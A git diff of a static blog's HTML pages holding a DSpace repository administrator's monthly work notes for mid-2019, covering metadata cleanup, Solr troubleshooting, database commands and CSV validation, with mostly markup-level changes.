$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Export new list of all authors from CGSpace database to send to Peter:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
COPY 64871
</code></pre><ul>
<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
@ -605,11 +605,11 @@ COPY 64871
<ul>
<li>I see the following error in the DSpace log when the user tries to log in with her CGIAR email and password on the LDAP login:</li>
</ul>
<pre><code>2019-05-30 07:19:35,166 INFO org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=A5E0C836AF8F3ABB769FE47107AE1CFF:ip_addr=185.71.4.34:failed_login:no DN found for user sa.saini@cgiar.org
<pre tabindex="0"><code>2019-05-30 07:19:35,166 INFO org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=A5E0C836AF8F3ABB769FE47107AE1CFF:ip_addr=185.71.4.34:failed_login:no DN found for user sa.saini@cgiar.org
</code></pre><ul>
<li>For now I just created an eperson with her personal email address until I have time to check LDAP to see what&rsquo;s up with her CGIAR account:</li>
</ul>
<pre><code>$ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p 'sknflksnfksnfdls'
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p &#39;sknflksnfksnfdls&#39;
</code></pre><!-- raw HTML omitted -->
@ -631,15 +631,15 @@ COPY 64871
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -34,7 +34,7 @@ Run system updates on CGSpace (linode18) and reboot it
Skype with Marie-Angélique and Abenet about CG Core v2
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ Skype with Marie-Angélique and Abenet about CG Core v2
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -115,7 +115,7 @@ Skype with Marie-Angélique and Abenet about CG Core v2
<p class="blog-post-meta">
<time datetime="2019-06-02T10:57:51+03:00">Sun Jun 02, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -169,7 +169,7 @@ Skype with Marie-Angélique and Abenet about CG Core v2
<ul>
<li>Thierry noticed that the CUA statistics were missing previous years again, and I see that the Solr admin UI has the following message:</li>
</ul>
<pre><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
<pre tabindex="0"><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
</code></pre><ul>
<li>I had to restart Tomcat a few times for all the stats cores to get loaded with no issue</li>
</ul>
@ -197,13 +197,13 @@ Skype with Marie-Angélique and Abenet about CG Core v2
</ul>
</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/countries.csv WITH CSV HEADER
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/countries.csv WITH CSV HEADER
COPY 192
$ csvcut -l -c 0 /tmp/countries.csv &gt; 2019-06-10-countries.csv
</code></pre><ul>
<li>Get a list of all the unique AGROVOC subject terms in IITA&rsquo;s data and export it to a text file so I can validate them with my <code>agrovoc-lookup.py</code> script:</li>
</ul>
<pre><code>$ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed 's/||/\n/g' | grep -v dc.subject | sort -u &gt; iita-agrovoc.txt
<pre tabindex="0"><code>$ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed &#39;s/||/\n/g&#39; | grep -v dc.subject | sort -u &gt; iita-agrovoc.txt
$ ./agrovoc-lookup.py -i iita-agrovoc.txt -om iita-agrovoc-matches.txt -or iita-agrovoc-rejects.txt
$ wc -l iita-agrovoc*
402 iita-agrovoc-matches.txt
@ -212,11 +212,11 @@ $ wc -l iita-agrovoc*
</code></pre><ul>
<li>Combine these IITA matches with the subjects I matched a few months ago:</li>
</ul>
<pre><code>$ csvcut -c name 2019-03-18-subjects-matched.csv | grep -v name | cat - iita-agrovoc-matches.txt | sort -u &gt; 2019-06-10-subjects-matched.txt
<pre tabindex="0"><code>$ csvcut -c name 2019-03-18-subjects-matched.csv | grep -v name | cat - iita-agrovoc-matches.txt | sort -u &gt; 2019-06-10-subjects-matched.txt
</code></pre><ul>
<li>Then make a new list to use with reconcile-csv by adding line numbers with csvcut and changing the line number header to <code>id</code>:</li>
</ul>
<pre><code>$ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed 's/line_number/id/' &gt; 2019-06-10-subjects-matched.csv
<pre tabindex="0"><code>$ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed &#39;s/line_number/id/&#39; &gt; 2019-06-10-subjects-matched.csv
</code></pre><h2 id="2019-06-20">2019-06-20</h2>
<ul>
<li>Share some feedback about AReS v2 with the colleagues and encourage them to do the same</li>
@ -231,18 +231,18 @@ $ wc -l iita-agrovoc*
</li>
<li>Update my local PostgreSQL container:</li>
</ul>
<pre><code>$ podman pull docker.io/library/postgres:9.6-alpine
<pre tabindex="0"><code>$ podman pull docker.io/library/postgres:9.6-alpine
$ podman rm dspacedb
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
</code></pre><h2 id="2019-06-25">2019-06-25</h2>
<ul>
<li>Normalize <code>text_lang</code> values for metadata on DSpace Test and CGSpace:</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE 1551
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE 2070
dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
dspace=# UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
UPDATE 2
</code></pre><ul>
<li>Upload 202 IITA records from earlier this month (20194th.xls) to CGSpace</li>
@ -291,7 +291,7 @@ UPDATE 2
</ul>
</li>
</ul>
<pre><code>$ dspace import -a -e me@cgiar.org -m 2019-06-30-AfricaRice-11to73.map -s /tmp/2019-06-30-AfricaRice-11to73
<pre tabindex="0"><code>$ dspace import -a -e me@cgiar.org -m 2019-06-30-AfricaRice-11to73.map -s /tmp/2019-06-30-AfricaRice-11to73
</code></pre><ul>
<li>I sent feedback about a few missing PDFs and one duplicate to Ibnou to check</li>
<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
@ -317,15 +317,15 @@ UPDATE 2
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -21,7 +21,7 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-07/" />
<meta property="article:published_time" content="2019-07-01T12:13:51+03:00" />
<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
<meta property="article:modified_time" content="2023-08-14T10:39:08+02:00" />
@ -38,7 +38,7 @@ CGSpace
Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -50,7 +50,7 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
"url": "https://alanorth.github.io/cgspace-notes/2019-07/",
"wordCount": "2330",
"datePublished": "2019-07-01T12:13:51+03:00",
"dateModified": "2019-10-28T13:39:25+02:00",
"dateModified": "2023-08-14T10:39:08+02:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -68,12 +68,12 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -119,7 +119,7 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
<p class="blog-post-meta">
<time datetime="2019-07-01T12:13:51+03:00">Mon Jul 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -153,13 +153,13 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
</ul>
</li>
</ul>
<pre><code>org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
<pre tabindex="0"><code>org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2010&#39;: Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
</code></pre><ul>
<li>I restarted Tomcat <em>ten times</em> and it never worked&hellip;</li>
<li>I tried to stop Tomcat and delete the write locks:</li>
</ul>
<pre><code># systemctl stop tomcat7
# find /dspace/solr/statistics* -iname &quot;*.lock&quot; -print -delete
<pre tabindex="0"><code># systemctl stop tomcat7
# find /dspace/solr/statistics* -iname &#34;*.lock&#34; -print -delete
/dspace/solr/statistics/data/index/write.lock
/dspace/solr/statistics-2010/data/index/write.lock
/dspace/solr/statistics-2011/data/index/write.lock
@ -170,29 +170,29 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
/dspace/solr/statistics-2016/data/index/write.lock
/dspace/solr/statistics-2017/data/index/write.lock
/dspace/solr/statistics-2018/data/index/write.lock
# find /dspace/solr/statistics* -iname &quot;*.lock&quot; -print -delete
# find /dspace/solr/statistics* -iname &#34;*.lock&#34; -print -delete
# systemctl start tomcat7
</code></pre><ul>
<li>But it still didn&rsquo;t work!</li>
<li>I stopped Tomcat, deleted the old locks, and will try to use the &ldquo;simple&rdquo; lock file type in <code>solr/statistics/conf/solrconfig.xml</code>:</li>
</ul>
<pre><code>&lt;lockType&gt;${solr.lock.type:simple}&lt;/lockType&gt;
<pre tabindex="0"><code>&lt;lockType&gt;${solr.lock.type:simple}&lt;/lockType&gt;
</code></pre><ul>
<li>And after restarting Tomcat it still doesn&rsquo;t work</li>
<li>Now I&rsquo;ll try going back to &ldquo;native&rdquo; locking with <code>unlockAtStartup</code>:</li>
</ul>
<pre><code>&lt;unlockOnStartup&gt;true&lt;/unlockOnStartup&gt;
<pre tabindex="0"><code>&lt;unlockOnStartup&gt;true&lt;/unlockOnStartup&gt;
</code></pre><ul>
<li>Now the cores seem to load, but I still see an error in the Solr Admin UI and I still can&rsquo;t access any stats before 2018</li>
<li>I filed an <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=685">issue with Atmire</a>, so let&rsquo;s see if they can help</li>
<li>And since I&rsquo;m annoyed and it&rsquo;s been a few months, I&rsquo;m going to move the JVM heap settings that I&rsquo;ve been testing on DSpace Test to CGSpace</li>
<li>The old ones were:</li>
</ul>
<pre><code>-Djava.awt.headless=true -Xms8192m -Xmx8192m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=5400 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false
<pre tabindex="0"><code>-Djava.awt.headless=true -Xms8192m -Xmx8192m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=5400 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false
</code></pre><ul>
<li>And the new ones come from Solr 4.10.x&rsquo;s startup scripts:</li>
</ul>
<pre><code> -Djava.awt.headless=true
<pre tabindex="0"><code> -Djava.awt.headless=true
-Xms8192m -Xmx8192m
-Dfile.encoding=UTF-8
-XX:NewRatio=3
@ -221,14 +221,14 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
</ul>
</li>
</ul>
<pre><code>$ sed -i 's/CC-BY 4.0/CC-BY-4.0/' item_*/dublin_core.xml
$ echo &quot;10568/101992&quot; &gt;&gt; item_*/collections
<pre tabindex="0"><code>$ sed -i &#39;s/CC-BY 4.0/CC-BY-4.0/&#39; item_*/dublin_core.xml
$ echo &#34;10568/101992&#34; &gt;&gt; item_*/collections
$ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair_mapped
</code></pre><ul>
<li>I noticed that all twenty-seven items had double dates like &ldquo;2019-05||2019-05&rdquo; so I fixed those, but the rest of the metadata looked good so I unmapped them from the temporary collection</li>
<li>Finish looking at the fifty-six AfricaRice items and upload them to CGSpace:</li>
</ul>
<pre><code>$ dspace import -a -e me@cgiar.org -m 2019-07-02-AfricaRice-11to73.map -s /tmp/SimpleArchiveFormat
<pre tabindex="0"><code>$ dspace import -a -e me@cgiar.org -m 2019-07-02-AfricaRice-11to73.map -s /tmp/SimpleArchiveFormat
</code></pre><ul>
<li>Peter pointed out that the Sharefair dates I fixed were not actually fixed
<ul>
@ -249,20 +249,20 @@ $ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair
</ul>
</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u &gt; /tmp/2019-07-04-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort -u &gt; /tmp/2019-07-04-orcid-ids.txt
$ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names.txt -d
</code></pre><ul>
<li>Send and merge a pull request for the new ORCID identifiers (<a href="https://github.com/ilri/DSpace/pull/428">#428</a>)</li>
<li>I created a CSV with some ORCID identifiers that I had seen change so I could update any existing ones in the databse:</li>
</ul>
<pre><code>cg.creator.id,correct
&quot;Marius Ekué: 0000-0002-5829-6321&quot;,&quot;Marius R.M. Ekué: 0000-0002-5829-6321&quot;
&quot;Mwungu: 0000-0001-6181-8445&quot;,&quot;Chris Miyinzi Mwungu: 0000-0001-6181-8445&quot;
&quot;Mwungu: 0000-0003-1658-287X&quot;,&quot;Chris Miyinzi Mwungu: 0000-0003-1658-287X&quot;
<pre tabindex="0"><code>cg.creator.id,correct
&#34;Marius Ekué: 0000-0002-5829-6321&#34;,&#34;Marius R.M. Ekué: 0000-0002-5829-6321&#34;
&#34;Mwungu: 0000-0001-6181-8445&#34;,&#34;Chris Miyinzi Mwungu: 0000-0001-6181-8445&#34;
&#34;Mwungu: 0000-0003-1658-287X&#34;,&#34;Chris Miyinzi Mwungu: 0000-0003-1658-287X&#34;
</code></pre><ul>
<li>But when I ran <code>fix-metadata-values.py</code> I didn&rsquo;t see any changes:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -m 240 -t correct -d
</code></pre><h2 id="2019-07-06">2019-07-06</h2>
<ul>
<li>Send a reminder to Marie about my notes on the <a href="https://github.com/AgriculturalSemantics/cg-core/issues/2">CG Core v2 issue I created two weeks ago</a></li>
@ -282,22 +282,22 @@ $ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names
</li>
<li>Playing with the idea of using <a href="https://github.com/BurntSushi/xsv">xsv</a> to do some basic batch quality checks on CSVs, for example to find items that might be duplicates if they have the same DOI or title:</li>
</ul>
<pre><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;,1&#39;
field,value,count
cg.identifier.doi,https://doi.org/10.1016/j.agwat.2018.06.018,2
$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;,1&#39;
field,value,count
dc.title,Reference evapotranspiration prediction using hybridized fuzzy model with firefly algorithm: Regional case study in Burkina Faso,2
</code></pre><ul>
<li>Or perhaps if DOIs are valid or not (having doi.org in the URL):</li>
</ul>
<pre><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E 'doi.org'
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;doi.org&#39;
field,value,count
cg.identifier.doi,https://hdl.handle.net/10520/EJC-1236ac700f,1
</code></pre><ul>
<li>Or perhaps items with invalid ISSNs (according to the <a href="https://en.wikipedia.org/wiki/International_Standard_Serial_Number#Code_format">ISSN code format</a>):</li>
</ul>
<pre><code>$ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v '&quot;' | grep -v -E '^[0-9]{4}-[0-9]{3}[0-9xX]$'
<pre tabindex="0"><code>$ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v &#39;&#34;&#39; | grep -v -E &#39;^[0-9]{4}-[0-9]{3}[0-9xX]$&#39;
dc.identifier.issn
978-3-319-71997-9
978-3-319-71997-9
@ -330,10 +330,10 @@ dc.identifier.issn
<li>Also, Jane asked me to check the Data Portal to see which email address requests for confidential data are going</li>
</ul>
</li>
<li>Yesterday Theirry from CTA asked me about an error he was getting while submitting an item on CGSpace: &ldquo;Unable to load Submission Information, since WorkspaceID (ID:S106658) is not a valid in-process submission.&rdquo;</li>
<li>Yesterday Thierry from CTA asked me about an error he was getting while submitting an item on CGSpace: &ldquo;Unable to load Submission Information, since WorkspaceID (ID:S106658) is not a valid in-process submission.&rdquo;</li>
<li>I looked in the DSpace logs and found this right around the time of the screenshot he sent me:</li>
</ul>
<pre><code>2019-07-10 11:50:27,433 INFO org.dspace.submit.step.CompleteStep @ lewyllie@cta.int:session_id=A920730003BCAECE8A3B31DCDE11A97E:submission_complete:Completed submission with id=106658
<pre tabindex="0"><code>2019-07-10 11:50:27,433 INFO org.dspace.submit.step.CompleteStep @ lewyllie@cta.int:session_id=A920730003BCAECE8A3B31DCDE11A97E:submission_complete:Completed submission with id=106658
</code></pre><ul>
<li>I&rsquo;m assuming something happened in his browser (like a refresh) after the item was submitted&hellip;</li>
</ul>
@ -350,30 +350,30 @@ dc.identifier.issn
<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
<li>Try to run <code>dspace cleanup -v</code> on CGSpace and ran into an error:</li>
</ul>
<pre><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(167394) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(167394) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);'
<pre tabindex="0"><code># su - postgres
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);&#39;
UPDATE 1
</code></pre><h2 id="2019-07-16">2019-07-16</h2>
<ul>
<li>Completely reset the Podman configuration on my laptop because there were some layers that I couldn&rsquo;t delete and it had been some time since I did a cleanup:</li>
</ul>
<pre><code>$ podman system prune -a -f --volumes
<pre tabindex="0"><code>$ podman system prune -a -f --volumes
$ sudo rm -rf ~/.local/share/containers
</code></pre><ul>
<li>Then pull a new PostgreSQL 9.6 image and load a CGSpace database dump into a new local test container:</li>
</ul>
<pre><code>$ podman pull postgres:9.6-alpine
<pre tabindex="0"><code>$ podman pull postgres:9.6-alpine
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-07-16.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>Start working on implementing the <a href="https://gist.github.com/alanorth/2db39e91f48d116e00a4edffd6ba6409">CG Core v2 changes</a> on my local DSpace test environment</li>
@ -388,7 +388,7 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</li>
<li>Sisay said a user was having problems registering on CGSpace and it looks like the email account expired again:</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: blahh@cgiar.org
@ -414,7 +414,7 @@ Please see the DSpace documentation for assistance.
<ul>
<li>Create an account for Lionelle Samnick on CGSpace because the registration isn&rsquo;t working for some reason:</li>
</ul>
<pre><code>$ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password 'blah'
<pre tabindex="0"><code>$ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password &#39;blah&#39;
</code></pre><ul>
<li>I added her as a submitter to <a href="https://cgspace.cgiar.org/handle/10568/74536">CTA ISF Pro-Agro series</a></li>
<li>Start looking at 1429 records for the Bioversity batch import
@ -442,7 +442,7 @@ Please see the DSpace documentation for assistance.
</ul>
</li>
</ul>
<pre><code> &lt;dct:coverage&gt;
<pre tabindex="0"><code> &lt;dct:coverage&gt;
&lt;dct:spatial&gt;
&lt;type&gt;Country&lt;/type&gt;
&lt;dct:identifier&gt;http://sws.geonames.org/192950&lt;/dct:identifier&gt;
@ -484,18 +484,18 @@ Please see the DSpace documentation for assistance.
<p>I might be able to use <a href="https://pypi.org/project/isbnlib/">isbnlib</a> to validate ISBNs in Python:</p>
</li>
</ul>
<pre><code>if isbnlib.is_isbn10('9966-955-07-0') or isbnlib.is_isbn13('9966-955-07-0'):
print(&quot;Yes&quot;)
<pre tabindex="0"><code>if isbnlib.is_isbn10(&#39;9966-955-07-0&#39;) or isbnlib.is_isbn13(&#39;9966-955-07-0&#39;):
print(&#34;Yes&#34;)
else:
print(&quot;No&quot;)
print(&#34;No&#34;)
</code></pre><ul>
<li>Or with <a href="https://github.com/arthurdejong/python-stdnum">python-stdnum</a>:</li>
</ul>
<pre><code>from stdnum import isbn
<pre tabindex="0"><code>from stdnum import isbn
from stdnum import issn
isbn.validate('978-92-9043-389-7')
issn.validate('1020-3362')
isbn.validate(&#39;978-92-9043-389-7&#39;)
issn.validate(&#39;1020-3362&#39;)
</code></pre><h2 id="2019-07-26">2019-07-26</h2>
<ul>
<li>
@ -510,7 +510,7 @@ issn.validate('1020-3362')
<p>I figured out a GREL to trim spaces in multi-value cells without splitting them:</p>
</li>
</ul>
<pre><code>value.replace(/\s+\|\|/,&quot;||&quot;).replace(/\|\|\s+/,&quot;||&quot;)
<pre tabindex="0"><code>value.replace(/\s+\|\|/,&#34;||&#34;).replace(/\|\|\s+/,&#34;||&#34;)
</code></pre><ul>
<li>I whipped up a quick script using Python Pandas to do whitespace cleanup</li>
</ul>
@ -554,15 +554,15 @@ issn.validate('1020-3362')
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
